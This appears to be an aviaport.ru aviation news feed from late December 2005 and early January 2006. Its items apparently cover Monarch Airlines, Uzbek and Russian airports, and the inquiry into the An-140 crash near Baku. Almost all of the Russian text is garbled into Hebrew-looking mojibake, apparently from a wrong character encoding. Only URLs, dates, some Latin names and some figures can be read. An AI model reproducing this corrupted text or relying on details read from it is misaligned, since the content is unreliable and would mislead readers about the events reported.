ײֶײ׀ײ 10 ֶ·׀ײׂ¨ובײכ.¸ µײו ¦ײ ז¨װ¨ב·×¨ ײדו כ ׀ײדם כד¨¬ײ 45 ׂ·װחו ״ײ׀¨ו , קֶ·״ י ״ב·ץ¨׀ ֶ כסכײ¦ח, וײ ״ב·דחודוכ·¨ ״םװײ¬ײ וחב·דו  ח¬בײי ¨ו ¢¨ףײ״ דװײדו· ״ײ׀¨ו . ¸ ב¨ץ·׀ דײכ¨בץ·ום װ¨ף ״׀ װ·בײכ װװח ״ײד ¦ֶח, וײ¢ס כסד ¦·ום ¢ב·ו װ₪  װ  ֶבײץ¨װײׂ ײדובײכֶ¨ ײבוײ-ה װוײ, ב ד״ײ׀ײי¨װװײׂ װ¨¦ ׀¨ֶײ ײו ד¨כ¨בװײ¬ײ ״ײ¢¨ב¨ים ¡×ב·ֶ·.הח¦ ״ײ כד¨ׂח, ױײכס½ ¬ײ¦ ¨ׂח ״ב·¦¨וד כדוב¨ו·ום װ  קוײׂ ײדובײכֶ¨ ד װ ד¨׀¨װ·¨ׂ כ ¨וסב¨ וסד· ¨׀ײכ¨ֶ. פ¦¨דם װ¨ו ֶ ף·װײ · װײװסµ ֶ׀ח¢ײכ. ¡ ¨¦·װדוכ¨װװסׂ ב ףכ׀¨¨װ·¨ׂ ׂ¨דוװסµ י·ו¨׀¨½ ײדו וד וײ׀םֶײ ״בײ¬ח׀ֶ· ״ײ ״¨ד װסׂ ¦װ ׂ. ב כ¦ , ·ׂ¨װװײ װ  קוײׂ ײדובײכ¨, דײ¬׀ דװײ ״ב¨¦ װ·ׂ, װ¨דֶײ׀םֶײ דוײ׀¨ו·½ װ ף ¦ ¢ח¦חש·½ ״¨בכײײוֶבסכ ו¨׀ם ¡ׂ¨ב·ֶ· ¶ב·דוײ×ײב ַײ׀חׂ¢ ״ײףװ ֶײׂ·׀ד דײ דכײ¨½ ¢ח¦חש¨½ י¨װײ½. ז ֶ ײבוײ-ה װוײ כײץ¨׀ כ ·דוײב·.ל״בײ¨ׂ, ח ¢ב·ו װדֶײ¬ײ "גײ¢·װףײװ " ¨ש¨ ײדו ¨וד ץ װד ¦ײ¢ב וםד ֶ ״ב ף¦װ·ֶח װ  ז¨װ¨ב·×¨. ב כ¦ , ו¨״¨בם ¨ׂח ״ב·¦¨וד כס¢·ב ום: ׀·¢ײ ײו״ב כ·וםד װ  ײדובײכ ׃ ¦¨½ב  װ  ״ בײׂ¨ · חי¨ ײווח¦  ״¨ב¨ד¨דום װ  ¦בח¬ײ½ ד ׂײ׀¨ו ¦ײ ׂ¨דו  װ ףװ ¨װ·, ׀·¢ײ כ¨בװחוםד ¦ײׂײ½ כ ¡װ¬׀·.¡כ· ֶײׂ״ װ· Monarch Airlines ״ײֶ  ¨ש¨ װ¨ ב¨ץ·׀ , ״ײ¦ כ ום ׀· כ דח¦ װ  װ¨ף ¦ ׀·כײ¬ײ ¢ב·ו װ₪  כ דכף· ד װ¨ף ״׀ װ·בײכ װװסׂ ·ףׂ¨װ¨װ·¨ׂ ׂ בץבחו , ֶײוײבײ¨, ״ײ ד׀ײכ ׂ ״ב¨¦דו כ·ו¨׀ ֶײׂ״ װ··, ײ¢ײץ׀ײדם ¨½ כ װ¨דֶײ׀םֶײ וסד ×חװוײכ דו¨ב׀·װ¬ײכ.ַדו ו·ױ¨דׂײוב װ  ¨וסב¨µ דײכח ף ¦¨ביֶח, ״ דד י·בס ״ײ׀װײדום ״ײ¦¦¨בי ׀· ב¨ץ¨װ·¨ קֶ·״ י  כסד ¦·ום דֶכ¨בװײד׀ײכ . ַ ֶ דײײ¢ש·׀  §יײ גײ¢¨בודײװ, ״ב¨¦דו כ·ו¨׀ם  כ· ֶײׂ״ װ·· Monarch Airlines, װ בחץ·ו¨׀ ד״ײֶײ½דוכ· ״ב¨¦׀ײי·׀· ״ײ¦״·ד ום ״בײוײֶײ׀, ¬¦¨ ¢ס׀ ף ×·ֶד·בײכ װ × ֶו ¨¬ײ װ¨״ײ¦ײ¢ ש¨¬ײ ״ײכ¨¦¨װ·, ײ¦װ ֶײ וײו ײוֶ ף ׀ד קוײ ד¦¨׀ ום. - - - - - לײף¦חץװײ¨ ״בײדוב װדוכײ ¶ ¢ בײכדֶ  ״חדוח¨ו - http://www.aviaport.ru/news/2006/01/02/99269.html - ¨בכײ¬ײ װכ ב ·ף ¶ ¢ בײכדֶ  װ¨ כס׀¨ו·ו װ· ײ¦·װ ד ׂײ׀¨ו. ¸ף ¶ ¢ בײכדֶ  כ ״¨בכס½ ¦¨װם ¬ײ¦  ׂײיװײ כס¢ב וםד וײ׀םֶײ ״ײ¨ף¦ײׂ,   ו ֶי¨  כוײוב װד״ײבוײׂ - Mon, 02 Jan 2006 13:03:00 +0300 - ¨בכײ¬ײ װכ ב ·ף ¶ ¢ בײכדֶ  װ¨ כס׀¨ו·ו װ· ײ¦·װ ד ׂײ׀¨ו. לײו ֶ ֶ ״בײֶײׂׂ¨װו·בײכ ׀· ד·וח ₪· ֶײבב¨ד״ײװ¦¨װוח ¸¡ REGNUM כ ¦·ד״¨ו¨בדֶײ½ ¶ ¢ בײכדֶײ¬ײ  קבײ״ײבו : "ה¨¬ײ¦װ װ· ײ¦·װ ד ׂײ׀¨ו ·µ ¶ ¢ בײכדֶ  װ¨ כס׀¨ו·ו. ז ֶ  ד·וח ₪· כ ¶ ¢ בײכדֶ¨ כ״¨בכס¨. ה ׂײ׀¨וס ·ף ¬ײבײ¦  װ¨ כס׀¨ו ו װ¨ ״ײ ״ב··װ¨ װ¨·ד״ב כװײדו·,   ״ײ ״ב··װ¨ ײודחודוכ· ב¨½דײכ. ׳ו װ ד כ ױײכס½ ¬ײ¦ װ·ֶוײ װ·ֶח¦  װ¨ ׀¨ו·ו. ¡כ· וײבס ײו¦סµ ו".¸ף ¶ ¢ בײכדֶ  כ ״¨בכס½ ¦¨װם ¬ײ¦  ׂײיװײ כס¢ב וםד וײ׀םֶײ ״ײ¨ף¦ײׂ,   ו ֶי¨  כוײוב װד״ײבוײׂ. - - - - - "זב װד קבײ" ב דֶבס׀ײ דובחֶוחבח  ֶ₪·ײװ¨בװײ¬ײ ֶ ״·ו ׀  - http://www.aviaport.ru/news/2005/12/29/99267.html - ׳¡׳ "¡כ· ֶײׂ״ װ· "זב װד קבײ" ב דֶבס׀ײ דובחֶוחבח דכײ¨¬ײ  ֶ₪·ײװ¨בװײ¬ײ ֶ ״·ו ׀ . 32,1%  ֶ₪·½ ֶײװובײ׀·בח¨ו "ׁײ¬ײל¡פ-ׁ", 44,1% כ׀ ¦¨ו ׀¨װס ד¨ׂם· ¡. ׀¨ץ ֶײכ  - Thu, 29 Dec 2005 17:30:00 +0300 - ׳¡׳ "¡כ· ֶײׂ״ װ· "זב װד קבײ" ב דֶבס׀ײ דובחֶוחבח דכײ¨¬ײ  ֶ₪·ײװ¨בװײ¬ײ ֶ ״·ו ׀ . ַ ֶ ד׀¨¦ח¨ו ·ף ײ×·₪· ׀םװסµ ׂ ו¨ב· ׀ײכ ֶײׂ״ װ··, 32,1%  ֶ₪·½ ֶײװובײ׀·בח¨ו "ׁײ¬ײל¡פ-ׁ", 44,1% כ׀ ¦¨ו ׀¨װס ד¨ׂם· ״ב¨¦ד¨¦ ו¨׀ דײכ¨ו  ¦·ב¨ֶוײבײכ "זב װד קבײ" ¡׀¨ֶד װ¦ב  ׀¨ץ ֶײכ . "ׁײ¬ײל¡פ-ׁ", חב¨י¦¨װװס½ כ 1996 ¬ײ¦ח ֶײׂ״ װ·¨½ "ׁײ¬ײל¡פ", ֶײװובײ׀·בח¨ו  ֶ₪·· "זב װד קבײ" ¨ב¨ף דכײ· ¦ײ¨בװ·¨ דובחֶוחבס - פ¡׳ £ײב¨½-2" · פ¡׳ "ג וׂ·ב+". ײ ¦ װװסׂ ·דוײװ·ֶ  "¸װו¨ב× ֶד " כ  כ· ₪·ײװװײ½ ײוב ד׀·, ד¨½ ד "ׁײ¬ײל¡פ-ׁ" חי¨ װ¨ ״ב·װ ¦׀¨י·ו "ׁײ¬ײל¡פח".הײ¬׀ דװײ ¦ײֶחׂ¨װוח, ״ב¨¦ד¨¦ ו¨׀ דײכ¨ו  ¦·ב¨ֶוײבײכ "זב װד קבײ" ¡׀¨ֶד װ¦בח ׀¨ץ ֶײכח ״ב·װ ¦׀¨י·ו 32,81% ײ¢סֶװײכ¨װװסµ  ֶ₪·½,   ¨¬ײ דח״בח¬¨, ¬¨װ¨ב ׀םװײׂח ¦·ב¨ֶוײבח ¡׳ ׳׀ם¬¨ ׀¨ץ ֶײכײ½ - 8,08%. ַבײׂ¨ וײ¬ײ, 3,25%  ֶ₪·½ "זב װד קבײ" ״ב·װ ¦׀¨י ו ׂ ו¨ב· ׀¨ץ ֶײכ , ״ב¨¦ד¨¦ ו¨׀ ׃¨י¬ײדח¦ בדוכ¨װװײ¬ײ  כ· ₪·ײװװײ¬ײ ֶײׂ·ו¨ו  ז וםװ¨ ¡װײ¦·װײ½.׳¡׳ "¡כ· ֶײׂ״ װ· "זב װד קבײ" ״ײ ״ דד י·בײײ¢ײבײוח כµײ¦·ו כ ·ד׀ײ ״ו· ֶבח״װ¨½ץ·µ בײדד·½דֶ·µ  כ· ֶײׂ״ װ·½. לסבחֶ  ײו ב¨ ׀·ף ₪·· ף  11 ׂ¨ד₪¨כ 2005 ¬ײ¦  - 8,9 ׂ׀ב¦ בח¢׀¨½, ״ דד י·בײײ¢ײבײו - 4,8 ׂ׀ב¦ ״ דד י·בײ-ֶ·׀ײׂ¨ובײכ. - - - - - ל  קבײ״ײבוח "ַחבחׂײ" װ  ׀  ¦¨½דוכײכ ום װײכ  ד״ב כײװ  ד·דו¨ׂ  TouchTown (ה ׂ ב ) - http://www.aviaport.ru/news/2005/12/29/99266.html - ל ׃¨י¦חװ בײ¦װײׂ  קבײ״ײבוח "ַחבחׂײ" װ  ׀  ¦¨½דוכײכ ום װײכ  ¸װ×ײבׂ ₪·ײװװײ-ד״ב כײװ  ד·דו¨ׂ  TouchTown - Thu, 29 Dec 2005 17:27:00 +0300 - ל ׃¨י¦חװ בײ¦װײׂ  קבײ״ײבוח "ַחבחׂײ" װ  ׀  ¦¨½דוכײכ ום װײכ  ¸װ×ײבׂ ₪·ײװװײ-ד״ב כײװ  ד·דו¨ׂ  TouchTown, - דײײ¢ש·׀· ֶײבב¨ד״ײװ¦¨װוח ¸¡ REGNUM-לײ׀¬ ¸װ×ײבׂ כ ״ב¨דד-ד׀חי¢¨  קבײ״ײבו . ­׀ כװסׂ ¦ײדוײ·װדוכײׂ ד·דו¨ׂס כ׀¨וד ײ״¨ב ו·כװײ¨ ״ב¨¦ײדו כ׀¨װ·¨ װ¨ײ¢µײ¦·ׂײ½ ״ דד י·בח ·װ×ײבׂ ₪·· ד ·ד״ײ׀םףײכ װ·¨ׂ ¢¨ף¬ב װ·װסµ כײףׂײיװײדו¨½ ׂח׀םו·ׂ¨¦· . ז¨״¨בם  כ· ״ דד י·בס ״ב· ״ײׂײש· ד¨װדײבװײ¬ײ ו¨בׂ·װ ׀  ׂײ¬חו ״ײ׀ח·ום ״ב ֶו·¨דֶ· ׀¢ח ·װ×ײבׂ ₪· װ¨ וײ׀םֶײ ײ¢  קבײ״ײבו¨, װײ · ״ײ ה ׂ ב¨ כ ₪¨׀ײׂ. ז ֶ, ¦ װװס¨ ד·דו¨ׂס "TouchTown" ״ײ¦¨׀¨װס װ  ¦כ  ¢׀ײֶ : "חו¨כײ¦·ו¨׀ם ״ײ ׃¨י¦חװ בײ¦װײׂח  קבײ״ײבוח "ַחבחׂײ" (ף¦¨דם ״ דד י·בס ׂײ¬חו ״ײףװ ֶײׂ·וםד ד ״׀ װײׂ ״ײׂ¨ש¨װ·½  קבײ״ײבו  · ״ב·׀¨¬ ש¨½ ֶ װ¨ׂח ו¨בב·וײב··,   ו ֶי¨ חףװ ום ײ ״ב¨¦ײדו כ׀¨ׂסµ חד׀ח¬ µ) · "לד ה ׂ ב " (כ ¢׀ײֶ¨ דײ¦¨בי·וד ·װ×ײבׂ ₪· ײ ¬ײדו·װ·₪ µ, ׂ¨דו µ ײו¦סµ , ב ףכ׀¨ֶ ו¨׀םװסµ · וײב¬ײכסµ ₪¨װוב µ, ֶײׂ״ װ·µ, ײֶ ףסכ ש·µ ב ף׀·װס¨ ״ײוב¨¢·ו¨׀םדֶ·¨ חד׀ח¬·). - - - - - ¶­¡ ״ב·ףסכ ¨ו יחבװ ׀·דוײכ ¢סום ׂ ֶד·ׂ ׀םװײ ֶײבב¨ֶוװסׂ· כ דײײ¢ש¨װ·µ ײ ב ¢ײו¨ ֶײׂ·דד·· ״ײ ב דד׀¨¦ײכ װ· ״ב··װ ֶ ו דובײ×ס ד ׂײ׀¨ו  ¡װ-140-100 - http://www.aviaport.ru/news/2005/12/29/99265.html - ל £ ֶח דײדוײ׀ דם ״ב¨דד-ֶײװרב¨װ₪· ״ײ ·וײ¬ ׂ ״ב¨¦כ ב·ו¨׀םװײ¬ײ ב דד׀¨¦ײכ װ· ״ב··װ ֶ ו דובײ×ס ד ׂײ׀¨ו  ¡װ-140-100 - Thu, 29 Dec 2005 17:18:00 +0300 - 28 ¦¨ֶ ¢ב 2005 ¬. כ £ ֶח דײדוײ׀ דם ״ב¨דד-ֶײװרב¨װ₪· ״ײ ·וײ¬ ׂ ״ב¨¦כ ב·ו¨׀םװײ¬ײ ב דד׀¨¦ײכ װ· ״ב··װ ֶ ו דובײ×ס ד ׂײ׀¨ו  ¡װ-140-100. ׳ ב¨ףח׀םו ו µ ב ¢ײוס ¦ײ׀ײי·׀· ײו ·ׂ¨װ· ֶײׂ·דד·· ״ײ ב דד׀¨¦ײכ װ· §י µ װ¬·ב ¡דֶ¨בײכ - ¬¨װ¨ב ׀םװס½ ¦·ב¨ֶוײב ¬ײדח¦ בדוכ¨װװײ¬ײ ֶײװ₪¨בװ  AZAL,  כ¨׀ ױ חׂ¨װֶײ - ¬¨װ¨ב ׀םװס½ ¦·ב¨ֶוײב ¶ בםֶײכדֶײ¬ײ ¬ײדח¦ בדוכ¨װװײ¬ײ  כ· ₪·ײװװײ¬ײ ״בײ·ףכײ¦דוכ¨װװײ¬ײ ״ב¨¦״ב·ו·, £ײב·ד ­ײבװײכ - ״ב¨¦דו כ·ו¨׀ם ׃¨י¬ײדח¦ בדוכ¨װװײ¬ײ ¡כ· ₪·ײװװײ¬ײ ַײׂ·ו¨ו , ל·ו ׀·½ ׃·ש¨װֶײ - ¦·ב¨ֶוײב ¦¨״ בו ׂ¨װו  ·װד״¨ֶו·בײכ װ· ¢¨ףײ״ דװײדו· ״ײ׀¨וײכ ­ײד כ· ד׀חי¢ס טֶב ·װס, ¸׀ם¬ ׂ ¡ׂ·בײכ - ״ב¨¦ד¨¦ ו¨׀ם ו¨µװ·¨דֶײ½ ֶײׂ·דד·· ״ײ ב דד׀¨¦ײכ װ· ֶ ו דובײ×ס. לײ כב¨ׂ ״ב¨דד-ֶײװרב¨װ₪·· ¢ס׀  ײ¬׀ ץ¨װ  ד׀¨¦חש  ·װ×ײבׂ ₪·.23 ¦¨ֶ ¢ב 2005 ¬. ״ײד׀¨ כס׀¨ו  ·ף  קבײ״ײבו  £ ֶח ״ײו¨ב״¨׀ ֶ ו דובײ×ח כ ב ½ײװ¨ ״ײד¨׀ֶ  ױ ב¦ ב װ װ  ״ײ¢¨ב¨ים¨ ַ ד״·½דֶײ¬ײ ׂײב ד ׂײ׀¨ו ¡װ-140-100 (װ ₪·ײװ ׀םװס½ · ב¨¬·דוב ₪·ײװװס½ ףװ ֶ 4ַ-AZ48) ױ ₪·ײװ ׀םװײ½  כ· ֶײׂ״ װ·· "¡ף¨ב¢ ½¦י װ ¶ כ  ¾ײ׀׀ בס". ה ׂײ׀¨ו, כס״ײ׀װכץ·½ ב¨½ד AHY 217 ״ײ ׂ בץבחוח £ ֶח (¡ף¨ב¢ ½¦י װ) - ¡ֶו ח (ַ ף µדו װ) ·ׂ¨׀ װ  ¢ײבוח 18 ״ דד י·בײכ · 5 ׀¨װײכ קֶ·״ י  (ֶײׂ װ¦·ב ׁ כב·װ ¡.¡.). ל ב¨ףח׀םו ו¨ ֶ ו דובײ×ס ״ײ¬·¢׀ײ 23 ¨׀ײכ¨ֶ , װ µײ¦·כץ·µד כ ד ׂײ׀¨ו¨, כ וײׂ ·ד׀¨ 5 ׀¨װײכ קֶ·״ י  · 18 ״ דד י·בײכ, דב¨¦· ֶײוײבסµ ¢ס׀· ¬ב י¦ װ¨ ¡ף¨ב¢ ½¦י װ  (10), ¡כדוב ׀·· (1), ל¨׀·ֶײ¢ב·ו װ·· (1), ­בחף·· (1), ַ ף µדו װ  (4), · זחב₪·· (1). לה ״ײ׀װײדום ב ףבחץ¨װײ.ל ב¨ףח׀םו ו¨ ײב¬ װ·ףײכ װװײ¬ײ ״ײ·דֶ  ײ¢׀ײֶׂ· לה ¢ס׀· ײ¢װ בחי¨װס װ  ¢¨ב¨¬ײכײ½ ¨בו¨ כ ב ½ײװ¨ װ ד¨׀¨װװײ¬ײ ״חװֶו  ױ ב¦ ב װ. בײכ¨¦¨װ·¨  כ ב·½װײ-ד״ ד ו¨׀םװסµ ב ¢ײו ײד׀ײיװ׀ײדם ו¨ׂװסׂ כב¨ׂ¨װ¨ׂ דחוײֶ · װ¨¢׀ ¬ײ״ב·וװסׂ· ״ײ¬ײ¦װסׂ· חד׀ײכ·ׂ· (װ·ףֶ  ײ¢׀ װײדום, ¦ײי¦ם, כ¨ו¨ב · כײ׀װ¨װ·¨ ׂײב). ַ ״ײ·דֶײכסׂ ב ¢ײו ׂ װ¨ׂ¨¦׀¨װװײ ¢ס׀· ״ב·כ׀¨¨װס ד·׀ס  כ ב·½װײ-ד״ ד ו¨׀םװסµ ד׀חי¢, ׃ל§, ­ײדח¦ בדוכ¨װװײ½ ״ײ¬ב װ·װײ½ ד׀חי¢ס, ­ב י¦ װדֶײ½ ײ¢ײבײװס ג¨ד״ח¢׀·ֶ· ¡ף¨ב¢ ½¦י װ. ל µײ¦¨ ב ¢ײו ¢ס׀· קכ ֶח·בײכ װס ײדו װֶ· כד¨µ ״ײ¬·¢ץ·µ. בײ¦ײ׀י וד ב ¢ײוס ״ײ ״ײ·דֶח · ·ףכ׀¨¨װ· ·ף ׂײב ×ב ¬ׂ¨װוײכ לה.ַײׂ·דד· ״ײ ב דד׀¨¦ײכ װ·  כ· ֶ ו דובײ×ס ד ׂײ׀¨ו  ¡װ-140-100 4ַ-AZ48, ·ףח·כ ¦ װװס¨ ײ¢¨ֶו·כװײ¬ײ ֶײװובײ׀, דװוס¨ ד ף ש·ש¨װװײ¬ײ ¢ײבוײכײ¬ײ װ ֶײ״·ו¨׀ חדובײ½דוכ  ב¨¬·דוב ₪·· £טג-92¡,   ו ֶי¨, דײ״ײדו כ·כ ·µ ד ·װ×ײבׂ ₪·¨½ ¦·ד״¨ו¨בדֶ·µ ד׀חי¢, ׂ ו¨ב· ׀ ׂ·, דײ¢ב װװסׂ· װ  ׂ¨דו¨ ֶ ו דובײ×ס, כײדדו װײכ·׀  ״ב¨¦כ ב·ו¨׀םװײ ד׀¨¦חשח ֶ בו·װח דײ¢סו·½.לף׀¨ו דײדוײ׀ד כ דײײוכ¨ודוכ·· ד ב ד״·ד װ·¨ׂ. ױ  קו ״¨ װ ¢ײב  כסדײוס ״בײ·ףײץ׀ײ חֶ׀ײװ¨װ·¨ כײף¦חץװײ¬ײ דח¦װ  (לה) ײו חדו װײכ׀¨װװײ½ וב ¨ֶוײב·· ״ײ׀¨ו . פ ו¨ׂ קֶ·״ י דײײ¢ש·׀ ד׀חי¢¨ טל§ ײ ו¨µװ·¨דֶ·µ ״בײ¢׀¨ׂ µ װ  ¢ײבוח לה. ¨ב¨ף װ¨דֶײ׀םֶײ ד¨ֶחװ¦ דכףם ד קֶ·״ י¨ׂ ״בײ״ ׀ ,   ײוׂ¨וֶ  לה ·ד¨ף׀  ד קֶב װײכ ב ¦ ב . ײ ¦ װװסׂ ײ¢¨ֶו·כװײ¬ײ ֶײװובײ׀ ״ײד׀¨ װ ¢ײב  כסדײוס ¦ײ 2100 ׂ ד ׂײ׀¨ו װ  ׀ דװ·י¨װ·¨ ״ײ װ·דµײ¦ש¨½ ד״·ב ׀· ד חׂ¨װםץ ש·ׂ·ד ב ¦·חד ׂ· ײו 500 ׂ ¦ײ 100 ׂ, דײכ¨בץ·כ ״ב· קוײׂ 4,5 כ·וֶ .ג דץ·×בײכֶ  ¢ײבוײכײ¬ײ חדובײ½דוכ  ב¨¬·דוב ₪·· ״ײֶ ף ׀ , וײ ¦כ·¬ ו¨׀· לה, ד·דו¨ׂס ח״ב כ׀¨װ·, קװ¨ב¬ײדװ ¢י¨װ· · ¦בח¬·¨ ¢ס׀· ·ד״ב כװס · ב ¢ײוײד״ײדײ¢װס.ױ  קו ״¨ װ ¢ײב  כסדײוס ¢ײבוײכסׂ חדובײ½דוכײׂ ב¨¬·דוב ₪·· ¢ס׀ײ ף ×·ֶד·בײכ װײ ײ¦װײכב¨ׂ¨װװײ¨ ײודחודוכ·¨ ·װ¦·ֶ ₪·· קֶ·״ יח כד¨µ וב¨µ  כ· ¬ײב·ףײװוײכ ( כ· ¬ײב·ףײװו - ״ב·¢ײב, ״ײֶ ףסכ ש·½ קֶ·״ יח ״ײ׀ײי¨װ·¨ לה כ ״בײדוב װדוכ¨).ַ װ דוײש¨ׂח כב¨ׂ¨װ· ״ב··װ  ײודחודוכ· ·װ¦·ֶ ₪··  כ· ¬ײב·ףײװוײכ װ¨ חדו װײכ׀¨װ . ­¨װ¨ב ׀םװס½ ¦·ב¨ֶוײב ֶײװ₪¨בװ  AZAL §י µ װ¬·ב ¡דֶ¨בײכ ף כ·׀ װ  ״ב¨דד-ֶײװ×ב¨װ₪··: "רו  ד·וח ₪· װ¨ דו װ¦ בוװ  · חװ·ֶ ׀םװ , ״ײקוײׂח וײ, וײ ״בײ·ףײץ׀ײ, כ׀¨וד ד׀¨¦דוכ·¨ׂ װ¨ֶ·µ דײ¢סו·½, ֶײוײבס¨ ¢ח¦חו ·ףח וםד". ג ¢ײו  ֶײׂ·דד·· ״בײ¦ײ׀י ¨וד.ײ ב¨ֶײׂ¨װ¦ ₪·· ֶײׂ·דד·· ב כ·ו¨׀םדוכײ ¡ף¨ב¢ ½¦י װ  ״ב·װ׀ײ ב¨ץ¨װ·¨ כב¨ׂ¨װװײ ״ב·ײדו װײכ·ום, ¦ײ ף כ¨בץ¨װ· ב דד׀¨¦ײכ װ· ֶ ו דובײ×ס, קֶד״׀ח ו ₪· ¡װ-140-100 כ  כ· ֶײׂ״ װ·· "¡ף¨ב¢ ½¦י װ ¶ כ  ¾ײ׀׀ בס". ַײװוב ֶו ׂ¨י¦ח ֶײװ₪¨בװײׂ AZAL · ¶ בםֶײכדֶ·ׂ ¬ײדח¦ בדוכ¨װװסׂ  כ· ₪·ײװװסׂ ״בײ·ףכײ¦דוכ¨װװסׂ ״ב¨¦״ב·ו·¨ׂ ײדו ¨וד כ ד·׀¨, ײ¦װ ֶײ דבײֶ· כס״ײ׀װ¨װ· ¨¬ײ ¢ח¦חו דֶײבב¨ֶו·בײכ װס ד ח¨וײׂ ײֶײװ ו¨׀םװסµ כסכײ¦ײכ ֶײׂ·דד··, ֶײוײבס¨ ײ¬׀ דו ״ײ ב¨ףח׀םו ו ׂ ב דד׀¨¦ײכ װ· ֶ ו דובײ×ס ד ׂײ׀¨ו  ¡װ-140-100, ״בײ·ףײץ¨¦ץ¨½ 23 ¦¨ֶ ¢ב 2005 ¬ײ¦ .ױ  ״ב¨דד-ֶײװרב¨װ₪··, דײדוײכץ¨½ד 28 ¦¨ֶ ¢ב כ £ ֶח, ¢ס׀ײ ײ¬׀ ץ¨װײ ף כ׀¨װ·¨ ֶײׂ·דד·· ״ײ ב דד׀¨¦ײכ װ· ״ב··װ ֶ ו דובײ×ס, דײ¬׀ דײכ װװײ¨ דײ כד¨ׂ· ¨¨ ח דוװ·ֶ ׂ·, כ וײׂ ·ד׀¨ · ד ״ב¨¦דו כ·ו¨׀ׂ· ¶­¡. ײקוײׂח ״ח¢׀·ֶ ₪·· ב¦  ק׀¨ֶובײװװסµ ה׃¸, דײ¦¨בי ש·¨ ·װ×ײבׂ ₪· ײ וײׂ, "וײ ״בײ·ףכײ¦·ו¨׀· ד ׂײ׀¨וײכ װ¨ דײ¬׀ דװס ד כסכײ¦ ׂ· ֶײׂ·דד··", װ¨ דײײוכ¨ודוכחו ¦¨½דוכ·ו¨׀םװײדו·.¶­¡ ײ¢ב ש ¨ו כװ·ׂ װ·¨ װ  װ¨¦ײ״חדו·ׂײדום ״בײ·ףכײ׀םװסµ ·װו¨ב״ב¨ו ₪·½ ״ײף·₪·· ״ב¨¦״ב·ו· · ״ײ¦¨בֶ·כ ¨ו, וײ װ· כ ײ¦װײׂ ·ף ·װו¨בכם, ¦ װװײׂ ״ב¨¦דו כ·ו¨׀ׂ ה׃¸, װ· ײ¦·װ ·ף בחֶײכײ¦·ו¨׀¨½ ״ב¨¦״ב·ו· װ¨ כסדֶ ףסכ ׀ װ· כ¨בד·½ ֶ ו דובײ×ס ד ׂײ׀¨ו  ¡װ-140-100, װ· ׂװ¨װ·½, ״בײו·כײב¨ ש·µ כסכײ¦ ׂ ֶײׂ·דד·· ״ײ ¨¨ ב דד׀¨¦ײכ װ·. - - - - - ¡קבײ״ײבו "¶¨בדײװ" ·ש¨ו ײ₪¨װש·ֶ  - http://www.aviaport.ru/news/2005/12/29/99264.html - ׁ·ֶכ·¦·בח¨ׂײ¨ ֶײׂׂחװ ׀םװײ¨ ״ב¨¦״ב·ו·¨ "¡קבײ״ײבו "¶¨בדײװ" ײ¢כ·׀ײ ֶײװֶחבד ״ײ ײו¢ײבח ײ₪¨װש·ֶ  דכײ¨¬ײ ₪¨׀ײדוװײ-·ׂחש¨דוכ¨װװײ¬ײ ֶײׂ״׀¨ֶד  - Thu, 29 Dec 2005 16:57:00 +0300 - ׁ·ֶכ·¦·בח¨ׂײ¨ ֶײׂׂחװ ׀םװײ¨ ״ב¨¦״ב·ו·¨ "¡קבײ״ײבו "¶¨בדײװ" ײ¢כ·׀ײ ֶײװֶחבד ״ײ ײו¢ײבח ײ₪¨װש·ֶ  דכײ¨¬ײ ₪¨׀ײדוװײ-·ׂחש¨דוכ¨װװײ¬ײ ֶײׂ״׀¨ֶד .׳¢ קוײׂ ¬ײכײב·וד כ דײײ¢ש¨װ··  קבײ״ײבו , דײײ¢ש ¨ו טֶב װדםֶ ױײכ·װ·.׳₪¨װֶ  ״בײכײ¦·וד ¦׀ חדו װײכ׀¨װ· ב ףׂ¨ב  כףװײד  כ חדו כװס½ ×ײװ¦, ֶײוײבס½ כװײד·וד ¶¨בדײװדֶ·ׂ ײ¢׀ דוװסׂ דײכ¨וײׂ כ דײף¦ כ ¨ׂײ¨ װ  ¢ ף¨  קבײ״ײבו  ײ¢ש¨דוכײ ד ײ¬ב װ·¨װװײ½ ײוכ¨ודוכ¨װװײדום "¡קבײ״ײבו "¶¨בדײװ".ט דוװ·ֶ ׂ ֶײװֶחבד  װ¨ײ¢µײ¦·ׂײ ״ײ¦ ום ¦ײֶחׂ¨װוס כ ֶײװֶחבדװח ֶײׂ·דד· ¦ײ 12 װכ ב 2006 ¬ײ¦  (כֶ׀·ו¨׀םװײ).¡קבײ״ײבו װ µײ¦·וד ״ײ  ¦ב¨דח: 73038, ¶¨בדײװ-38.׳ב¬ װ·ף ₪·ײװװײ-״ב כײכ  ×ײבׂ   קבײ״ײבו  "¶¨בדײװ" - ֶײׂׂחװ ׀םװ  דײ¢דוכ¨װװײדום (דײכׂ¨דוװ  דײ¢דוכ¨װװײדום ו¨בב·וײב· ׀םװסµ ײ¢ש·װ ײ¢׀ דו·). - - - - - ׳׳׳ "ׁטַ׳¾ׁ-¡קבײ" ״ב·ײ¢ב¨׀ײ ח  כ· ֶײׂ״ װ· "ה·¢·בם" וײ״׀·כײף ״ב כײװס½ ֶײׂ״׀¨ֶד כ ׂ¨י¦חװ בײ¦װײׂ  קבײ״ײבוח ¨׀¢·װדֶ  - http://www.aviaport.ru/news/2005/12/29/99263.html - ׳׳׳ "ׁטַ׳¾ׁ-¡קבײ" (100-״בײ₪¨װוװ  ¦ײ¨בװ ֶײׂ״ װ· ׳¡׳ "ׁטַ׳¾ׁ") ״ב·ײ¢ב¨׀ײ ח ׳¡׳ "¡כ· ֶײׂ״ װ· "ה·¢·בם" זפַ "£ ׀ װ¦·װײ" כ ׂ¨י¦חװ בײ¦װײׂ  קבײ״ײבוח ¨׀¢·װדֶ  - Thu, 29 Dec 2005 16:55:00 +0300 - ׳׳׳ "ׁטַ׳¾ׁ-¡קבײ" (100-״בײ₪¨װוװ  ¦ײ¨בװ ֶײׂ״ װ· ׳¡׳ "ׁטַ׳¾ׁ") ״ב·ײ¢ב¨׀ײ ח ׳¡׳ "¡כ· ֶײׂ״ װ· "ה·¢·בם" וײ״׀·כײף ״ב כײװס½ ֶײׂ״׀¨ֶד (זפַ) "£ ׀ װ¦·װײ" כ ׂ¨י¦חװ בײ¦װײׂ  קבײ״ײבוח ¨׀¢·װדֶ , דײײ¢ש ¨ו ״ב¨דד-ד׀חי¢  ׁטַ׳¾ׁ . ­ײ¦ײכײ½ ײ¢¨ׂ ף ״ב כֶ· דײדו כ׀¨ו ״ב·ׂ¨בװײ 40 וסד. וײװװ. ל ¢׀·י ½ץ¨¨ כב¨ׂ ׳׳׳ "ׁטַ׳¾ׁ-¡קבײ" ״׀ װ·בח¨ו ״בײכ¨דו· ב¨ֶײװדובחֶ₪· · ׂײ¦¨בװ·ף ₪· 